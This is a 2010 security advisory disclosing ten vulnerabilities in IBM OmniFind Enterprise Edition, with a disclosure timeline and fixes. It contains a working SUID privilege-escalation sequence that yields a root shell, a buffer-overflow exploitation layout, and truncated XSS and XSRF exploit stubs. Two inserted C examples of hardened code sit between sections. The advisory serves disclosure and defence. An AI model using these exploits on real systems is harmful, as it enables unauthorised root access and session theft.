============================================
|||          Security Advisory           |||
|||     CVE-2010-3890 (CVE candidate)    |||
|||     CVE-2010-3891 (CVE candidate)    |||
|||     CVE-2010-3892 (CVE candidate)    |||
|||     CVE-2010-3893 (CVE candidate)    |||
|||     CVE-2010-3894 (CVE candidate)    |||
|||     CVE-2010-3895 (CVE candidate)    |||
|||     CVE-2010-3896 (CVE candidate)    |||
|||     CVE-2010-3897 (CVE candidate)    |||
|||     CVE-2010-3898 (CVE candidate)    |||
|||     CVE-2010-3899 (CVE candidate)    |||
============================================

IBM OmniFind several issues
===========================

Date released: 11/2010
Date reported: 04/2009

by Fatih Kilic
Fraunhofer Institute for Secure Information Technology
fatih.kilic@sit.fraunhofer.de

http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899

Vendor:  IBM
Product: IBM OmniFind Enterprise Edition
Website: http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/

Vulnerabilities:
- Cross-Site-Scripting (XSS)
- Cross-Site-Request-Forgery (XSRF)
- Session fixation
- Session impersonation
- Remote buffer overflow
- Privilege escalation in two applications
- Missing authentication in configuration panel
- Admin password is delivered in plaintext inside the server response
- Cookies are set for root path, not application path
- Crawler endless loop

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

Quoting
http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/:

| IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters through knowledge driven search.
|
| It's designed to drive users to the knowledge they seek and enhance the visibility of content and context of your organization's unstructured information.
|
| * Dynamic - delivers complete dynamic facet capabilities, type-ahead search, real-time content alerting, is reactive to search-led content exploration
| * Tailorable - delivers business adjustable relevancy and UIMA standardization for entity identification and tuned semantic searching
| * Supportable - delivers search on 20+ platforms, connects to 30+ repositories
| * Secure - delivers enforced security across content repositories
| * Scalable - lucene-based index for enterprise level scalability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

* Cross-Site-Scripting (XSS) (CVE-2010-3890)

The GET parameter »command« used inside the administration interface is embedded directly into the HTML source without any input validation or output sanitization. Using this parameter, an attacker can inject arbitrary JavaScript code, which will run in the session context of other users. As session credentials are stored in cookies, an attacker can steal the cookie, impersonate the session (CVE-2010-3893) and control the web application within the browser context of the victim.

Exploit to show cookies:

http://omnifind-host/ESAdmin/collection.do?command=

* Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891)

The forms in the administrator interface are not protected against XSRF. An attacker can perform any action in the context of the victim. Example attack scenario: the attacker creates a malicious website containing a prepared form that adds a new user and is submitted automatically on load.
Exploit to add an admin user:

Some seemingly benign web-site
Solution: Fixed in release v9.1 of Omnifind.

* Session fixation (CVE-2010-3892)

The login form of the administrator interface is vulnerable to session fixation attacks. An attacker can use a prepared website or the XSS vulnerability (CVE-2010-3890) to change the session ID (SID) of the login form. The SID has to be generated by the server: an attacker can visit the login interface, take the generated value and use it for the attack. After the victim has authenticated with the attacker's SID, the attacker can perform any action in the context of the administrator.

* Session impersonation (CVE-2010-3893)

The session ID (SID) is the only form of user authentication after the login, and it is not bound to an IP address. By reading the cookies of the victim, e.g. using an XSS attack (CVE-2010-3890), the whole session can be hijacked, and the attacker can perform any action in the context of the administrator from any computer that can reach the administrator interface.

* Remote buffer overflow (CVE-2010-3894)

The administration interface has a login form with a username and a password field. Entering a valid username (default value is »esadmin«) and a very long string into the password field triggers a buffer overflow. The function Java_com_ibm_es_oss_CryptionNative_ESEncrypt(), defined in the file /opt/IBM/es/lib/libffq.cryptionjni.so, copies the password value into a fixed-size buffer of 2048 bytes.

There are two attack points to exploit this buffer overflow. The first attack is based on the following buffer combination:

-------------------------------------------------------------------------
password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes)
-------------------------------------------------------------------------

The inserted value for »firstattackpoint« ends up in the registers EAX and EDI. These registers are used as the destination of a write, so an arbitrary address can be supplied as the location to write to.

The second attack overwrites the saved return address and has the following layout:
-------------------------------------------------------------------------
password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes) + 480 bytes + EDX (4 bytes) + EAX (4 bytes) + EIP (4 bytes)
-------------------------------------------------------------------------

To reach the return to the overwritten instruction pointer, a valid writeable address has to be inserted as firstattackpoint. This second attack has a restriction: only printable ASCII values can be used, since non-printable characters are removed from the input string. This is no real barrier, since the code is big enough to contain many jmp/call addresses that consist of printable ASCII values. During the overwrite the register ESI points to the input, so a call *%esi can be used to jump to the ASCII-filtered shellcode. At the first attack point the input is unfiltered, so arbitrary values can be inserted. Combining both attacks, the overflow can be exploited remotely to obtain a (root) shell. Default running user is root :)

* Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.

-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------

»esRunCommand« takes one argument and runs it as root. See the example below.

-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
OUTPUT: cmd is id
id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------

The application »estaskwrapper« is meant to start the application »estasklight«. The pseudo C code looks like this:

-------------------------------------------------------------------------
int main(int argc, char **argv)
{
    int auth = 0;
    ...
    /* first command line argument compared with the fixed program name */
    if (strcmp(argv[1], "estasklight") == 0) {
        auth = 1;
        ...
        /* user-controlled value forwarded into the loader environment */
        path = getenv("ES_LIBRARY_PATH");
        if (path) {
            setenv("LD_LIBRARY_PATH", path, 1);
            setenv("LIBPATH", path, 1);
            ...
            if (auth) {
                /* bare name, resolved through the caller's PATH, still as root */
                execvp("estasklight", args);
            }
            ...
        }
        ...
    }
    ...
}
-------------------------------------------------------------------------

Explanation of the code: »argv[1]« is the first command line argument, which is compared with the string »estasklight«. If it is equal, the »auth« flag is set. If the user has the environment variable »ES_LIBRARY_PATH« set, its value is copied into two new environment variables, »LD_LIBRARY_PATH« and »LIBPATH«. If the »auth« flag is set, the application »estasklight« is executed via execvp(), i.e. it is looked up through the caller's PATH, which the caller controls.

Exploit for running /bin/sh:

-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------

* Missing authentication in configuration panel (CVE-2010-3896)

All pages below the path »http://omnifind-host/ESSearchApplication/« are reachable without any authentication. The server configuration page is located inside this directory at »http://omnifind-host/ESSearchApplication/palette.do«. An attacker can change the server configuration without authenticating against the application.

* Admin password is delivered in plaintext inside the server response (CVE-2010-3897)

The administrator password is embedded as a value inside the HTML form at »http://omnifind-host/ESSearchApplication/palette.do« and is transmitted in plaintext over HTTP. An attacker with access to this page, for example obtained through another bug like »missing authentication« (CVE-2010-3896) or »session impersonation« (CVE-2010-3893), can use this password as a backdoor to the system.
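The bounded copy that removes the buffer overflow described above (CVE-2010-3894), as an added example that is not IBM's code: the 2048-byte buffer size is from the advisory, the function names and the vulnerable reconstruction are assumptions.

```c
/* Added example, not IBM's code: a reconstruction of the unbounded copy
 * described for Java_com_ibm_es_oss_CryptionNative_ESEncrypt() (CVE-2010-3894)
 * next to a bounded replacement. The 2048-byte buffer size is from the
 * advisory; the function names here are assumptions. */
#include <string.h>

#define ES_PW_BUF 2048   /* fixed-size buffer named in the advisory */

/* Vulnerable pattern: unbounded copy of the password into a fixed stack
 * buffer. Anything longer than the buffer overwrites what follows it on the
 * stack (saved registers, return address). Kept only for contrast. */
int es_encrypt_unbounded(const char *password)
{
    char buf[ES_PW_BUF];
    strcpy(buf, password);            /* no length check */
    return (int)strlen(buf);
}

/* Hardened pattern: refuse input that does not fit, then copy with an
 * explicit bound and a guaranteed NUL terminator. Returns the number of
 * bytes copied, or -1 when the password is too long for `out`. */
int es_encrypt_bounded(const char *password, char *out, size_t outlen)
{
    /* look for the terminator only within the bound, never beyond it */
    const char *end = memchr(password, '\0', outlen);
    if (end == NULL)                  /* no terminator within outlen: too long */
        return -1;
    size_t n = (size_t)(end - password);
    memcpy(out, password, n + 1);     /* includes the terminator */
    return (int)n;
}

/* Same entry point shape as the vulnerable version, with the fix applied. */
int es_encrypt_checked(const char *password)
{
    char buf[ES_PW_BUF];
    return es_encrypt_bounded(password, buf, sizeof buf);
}

/* Test helper: result of the checked path for a password of `len` 'A's. */
int es_encrypt_checked_len(size_t len)
{
    char pw[4096];
    if (len >= sizeof pw) return -2;  /* constructed input, capped */
    memset(pw, 'A', len);
    pw[len] = '\0';
    return es_encrypt_checked(pw);
}
```

A 2080-byte password, the length the advisory's first layout starts from, is rejected before any copy takes place.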
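A hardened shape for the »estaskwrapper« pattern above (CVE-2010-3895), as an added example that is not IBM's code: the install path /opt/IBM/es/bin is from the advisory, the function names and the fixed child environment are assumptions.

```c
/* Added example, not IBM's code: a hardened shape for the estaskwrapper
 * pattern above (CVE-2010-3895), which execvp()s the bare name "estasklight"
 * via the caller's PATH and forwards ES_LIBRARY_PATH into LD_LIBRARY_PATH.
 * Install path /opt/IBM/es/bin is from the advisory; names are assumptions. */
#include <string.h>
#include <unistd.h>

#define ES_BIN_DIR "/opt/IBM/es/bin"
#define ES_TARGET  "estasklight"     /* the only program the wrapper may start */

/* Map argv[1] to an absolute path in `out`; NULL unless it is exactly
 * ES_TARGET (so any relative or absolute path from the caller is refused). */
const char *es_resolve_target(const char *name, char *out, size_t outlen)
{
    if (strcmp(name, ES_TARGET) != 0)
        return NULL;
    size_t dirlen = strlen(ES_BIN_DIR), namelen = strlen(name);
    if (dirlen + 1 + namelen + 1 > outlen)       /* dir + '/' + name + NUL */
        return NULL;
    memcpy(out, ES_BIN_DIR, dirlen);
    out[dirlen] = '/';
    memcpy(out + dirlen + 1, name, namelen + 1); /* copies the NUL too */
    return out;
}

/* Environment for the privileged child: nothing inherited from the caller, so
 * PATH, LD_LIBRARY_PATH, LIBPATH and ES_LIBRARY_PATH set by an unprivileged
 * user cannot steer what the root process loads or runs. */
static char *const ES_CHILD_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Test helper: 1 if `name` resolves exactly to `expect`, 0 if it resolves
 * elsewhere, -1 if it is refused. */
int es_resolve_check(const char *name, const char *expect)
{
    char buf[256];
    const char *p = es_resolve_target(name, buf, sizeof buf);
    return p == NULL ? -1 : strcmp(p, expect) == 0;
}

/* Wrapper entry point: validate, then execve() by absolute path with the
 * explicit environment instead of execvp() with the inherited one. */
int main(int argc, char **argv)
{
    char target[256];
    if (argc < 2 || es_resolve_target(argv[1], target, sizeof target) == NULL)
        return 2;                        /* refuse everything else */
    char *const child_argv[] = { target, NULL };
    execve(target, child_argv, ES_CHILD_ENV);
    return 1;                            /* exec failed */
}
```

With the target pinned and the environment fixed, the advisory's PATH and ES_LIBRARY_PATH manipulation has nothing to act on.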
* Cookies are set for root path, not application path (CVE-2010-3898)

The cookies are not restricted to the »ESAdmin« path; they are set for the domain root path. Every page inside the same domain, even in other directories, can access the administrator cookies and steal the session ID, which is used for authentication.

* Crawler endless loop (CVE-2010-3899)

The crawler has no recursion depth limit. A site with dynamic parameter manipulation can cause an endless loop. This loop blocks the crawler thread and permanently consumes server resources; too many blocked threads can lead to a denial of service. The same site is also indexed multiple times, so the search results display it many times over. This can be abused for spamming the search results.

Exploit to test the endless loop:

-------------------------------------------------------------------------
/* loop.php */
click me'; ?>
-------------------------------------------------------------------------

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Timeline:

* 04/2009: Vulnerability reported to IBM
* 05/2009: Response from IBM with a timeline of security updates
* 07/2010: Coordinating public release of advisory
* 11/2010: Public release of advisory

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

A fix for the buffer overflow (CVE-2010-3894) was provided in Omnifind v8.5 Fixpack 6:
https://www-304.ibm.com/jct01003c/support/docview.wss?rs=3278&context=SS5SQ7&uid=swg24027159&loc=en_US&cs=utf-8&lang=en

Cross-Site-Scripting (CVE-2010-3890) and Privilege escalation in two applications (CVE-2010-3895) are fixed in release v9.1 of Omnifind.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Fatih Kilic, Fraunhofer SIT (discovery)